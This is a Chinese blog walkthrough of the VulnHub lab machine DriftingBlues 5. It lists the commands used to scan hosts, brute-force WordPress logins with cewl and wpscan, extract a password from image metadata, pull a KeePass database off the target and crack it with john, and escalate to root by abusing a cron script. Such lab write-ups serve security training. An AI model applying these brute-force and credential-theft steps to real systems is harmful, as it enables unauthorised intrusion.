靶机渗透练习05-driftingblues5

最新推荐文章于 2024-04-01 20:30:00 发布
最新推荐文章于 2024-04-01 20:30:00 发布
阅读量2.2k 收藏 3
点赞数 1
分类专栏: 和我一起来打靶! 文章标签: 渗透测试 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Forces_/article/details/123828839
版权

靶机地址: https://www.vulnhub.com/entry/driftingblues-5,662/

1、主机探活

arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息)
masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号)
netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段)
nmap -sn 192.168.111.0/24

2、端口扫描

nmap -sS -A -sV -T4 -p- 192.168.111.15
22—ssh—OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80—http—Apache httpd 2.4.38 ((Debian))

3、80端口分析在这里插入图片描述
可以看到此站点是一个wordpress,老样子,先上扫描器扫一下

wpscan --url http://192.168.111.17/ -e u

发现几个用户名,但是并没有发现存在漏洞的插件
4、使用 cewl 生成网站字典 wpscan 破解账号和密码

cewl -m 6 -w passwd.txt http://192.168.111.17  
因为wordpress系统密码最少6位,所以使用参数-m 6

使用wpscan对用户名进行爆破:
wpscan --url http://192.168.111.17/ -e u --passwords passwd.txt

在这里插入图片描述
成功爆破出账号密码 gill / interchangeable
5、继续信息收集
在这里插入图片描述
在媒体文件夹中,发现一个首页不存在而且比较奇怪的图片,下载该图片用 exiftool 工具进行分析

wget http://192.168.111.17/wp-content/uploads/2021/02/dblogo.png
exiftool dblogo.png

在这里插入图片描述
发现 ssh 密码 59583hello
6、登录gill用户

ssh gill@192.168.111.17

7、继续信息收集
在gill用户的文件夹中发现一个keyfile.kdbx文件,这是一种数据库的加密文件。
在这里插入图片描述

在 https://tzusec.com/crackingkeepass-database/  找到相关破解方法

1、先在靶机目录中开启web临时服务:python -m SimpleHTTPServer 80
2、将keyfile.kdbx下载回本地:wget http://192.168.111.17/keyfile.kdbx 
3、将 keyfile.kdbx 内容转为 john 支持的格式: keepass2john keyfile.kdbx > Keepasshash.txt
4、然后使用 john 破解: john --wordlist=/usr/share/wordlists/rockyou.txt Keepasshash.txt

在这里插入图片描述
破解出密码: porsiempre
8、

破解kdbx密码后可以上传到keeWeb打开,地址为:https://app.keeweb.info/

在这里插入图片描述
然后输入刚才破解出来的密码
在这里插入图片描述
分析完成后发现六个密码

2real4surreal
buddyretard
closet313
exalted
fracturedocean
zakkwylde

9、寻找root密码
在根目录下找到一个文件夹为keyfolder,和上面的keyfile相似,进去看看,发现里面是空的啥也没有
此时思路断掉了,尝试像靶机driftingblues4一样上传一个监控程序,看看访问情况

kali起个临时服务
靶机下载pspy64: wget http://192.168.111.7/pspy64
给予权限:chmod +x pspy64
执行:./pspy64

在这里插入图片描述
发现在根目录下,每分钟就执行一个key.sh的脚本文件
可以发现没有权限查看脚本,只能猜脚本可能有什么内容, 根据上面情况看,应该是 keypass 相关的身份认证代码

10、根据前面获取的信息,我们现在可以推测: /root/key.sh 脚本会通过计划任务执行,可能会访问 /keyfolder 目录中对应的 key 文件

使用keyfile.kdbx文件中的名称,新建文件,一旦建立正确的文件名,就会获得一个新的文件,

Tips:一开始尝试无法成功,把pspy64文件放到了该文件夹下,把这个无关文件删除或者移动到其他地方,就可以生成新的txt文件

在这里插入图片描述
11、查看该文件的内容,得到root的密码 imjustdrifting31 ,拿到最高权限

12、最后查看了key.sh的内容,发现会检测keyfloder中的文件名,当只有一个名字为fracturedocean的文件时,才会执行后面的命令,所以在上面多次尝试都失败的原因为,未清空keyfolder文件夹中的无关文件
在这里插入图片描述
完结散花~

总结:
1、cewl 网站字典生成工具配合wpscan爆破得到密码
2、exiftool 图片内容提取工具得到ssh密码
3、.kdbx文件密码破解
4、解密 keepass 数据库获取密码
5、创建 key 文件提权

参考:https://www.freebuf.com/vuls/278983.html
http://www.hackdig.com/04/hack-338276.htm
鹏组安全的师傅提供的wp

佛系的新仔
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Hackmyvm综合靶机 | Driftingblues-5
IerkeU的博客
04-14 538
当我们需要将项目部署到远程服务器或者在服务器之间传输数据时,经常会使用scp命令(linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令)
靶机实战:Funbox10
最新发布
CHAsichuan的博客
06-14 2211
一次中等难度的靶机超详细版记录
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-5
Aluxian_的博客
06-21 1623
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址:https://www.vulnhub.com/entry/driftingblues-5,662/ 前言:这里又是DriftingBlues-2的问题 需要自己配网卡具体参考:https://blog.csdn.net/Alu
[Vulnhub靶机] DriftingBlues: 5
haosha。的博客
02-13 1989
[Vulnhub靶机] DriftingBlues: 5靶机渗透思路及方法(个人分享)
vulnhub靶场之driftingblues-5
qq_58091216的博客
04-01 983
具体来说,这个命令是将远程计算机上gill用户的/home/gill/目录中以”key”开头的文件复制到本地计算机的/root/目录。它提供了一个用户友好的界面,允许用户存储和管理他们的密码,并使用加密技术来保护这些密码。使用keyfile.kdbx文件中的名称,新建文件fracturedocean然后建立正确的文件名 就会获得一个新的文件rootcreds.txt。但是没有找到任何可以提权的,我们发现在根目录下,有一个keyfile.kdbx文件(第一次遇到这种文件)什么是DKBX文件?
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
keepass.py:用于读取 kdbx 文件的后端和命令行工具
07-07
keepass.py 用于读取 kdbx 文件的后端和命令行工具 使用作为实现格式的文档。 不幸的是,该链接上的数据不完整,导致实施无法正常工作。
pspy:在没有root权限的情况下监视linux进程
03-31
pspy-无特权Linux进程监听 pspy是一种命令行工具,旨在无需根权限就可以窥探进程。 它允许您在其他用户执行命令时查看它们,cron作业等。 非常适合枚举CTF中Linux系统。 很好地向您的同事展示为什么在命令行中将秘密作为参数传递是一个坏主意。 该工具从procfs扫描中收集信息。 放置在文件系统选定部分上的Inotify观察程序将触发这些扫描,以捕获短暂的进程。 入门 下载 将工具安装到要检查Linux机器上。 首先获取二进制文件。 在此处下载发布的二进制文件: 32位大,静态版本: pspy32 64位大,静态版本: pspy64 32位小版本: pspy32s 64位小版本: pspy64s 静态编译的文件应可在任何Linux系统上使用,但容量很大(〜4MB)。 如果有大小问题,请尝试较小的版本,该版本取决于libc并使用UPX(〜1MB)压缩。 建造 您可以使用系
windows系统kdbx文件打开工具
05-31
kdbx文件打开工具
Driftingblues靶机01
qq_37301470的博客
06-01 307
基于kali的渗透 vlunhub靶机
靶机渗透练习01-driftingblues
hirak0的博客
04-13 1308
靶机描述 靶机地址:https://www.vulnhub.com/entry/driftingblues-1,625/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email (it should be on my profile) for troubleshoo
Vulnhub-driftingbules:5 靶机复现完整过程
Continuejww的博客
09-24 350
用于安全存储Windows,电子邮件帐户,FTP站点,电子商务站点和其他目的的个人登录凭据。回到kali得终端,发现根目录下存在keyfolder,发现 /keyfolder,这应该就是 KeePass 的文件。根据大佬文章提示,使用keyfile.kdbx文件中的名称,新建文件,一旦建立正确的文件名,就会获得一个新的文件。传到 kali 上破解,kali 上有个 keepass2john 工具,可以获取 kdbx 文件中的密码哈希值。里面应该隐藏信息, 上传pspy64,赋予执行权限,然后。
grotesque_vh-1.0.1 vulnhub靶场通关 (keepass2john)
weixin_62621015的博客
03-24 376
grotesque_vh-1.0.1 vulnhub靶场通关 (keepass2john)
Grotesque:3.0.1 vulnhub靶场(papy64,linpeas.sh)
weixin_62621015的博客
04-03 595
Grotesque:3.0.1 vulnhub靶场(papy64,linpeas.sh)
Vulnhub靶机渗透环境搭建及JIS-CTF入门实践
本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。 一、Vulnhub简介 Vulnhub是一个开源的渗透测试平台,提供了多种类型的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值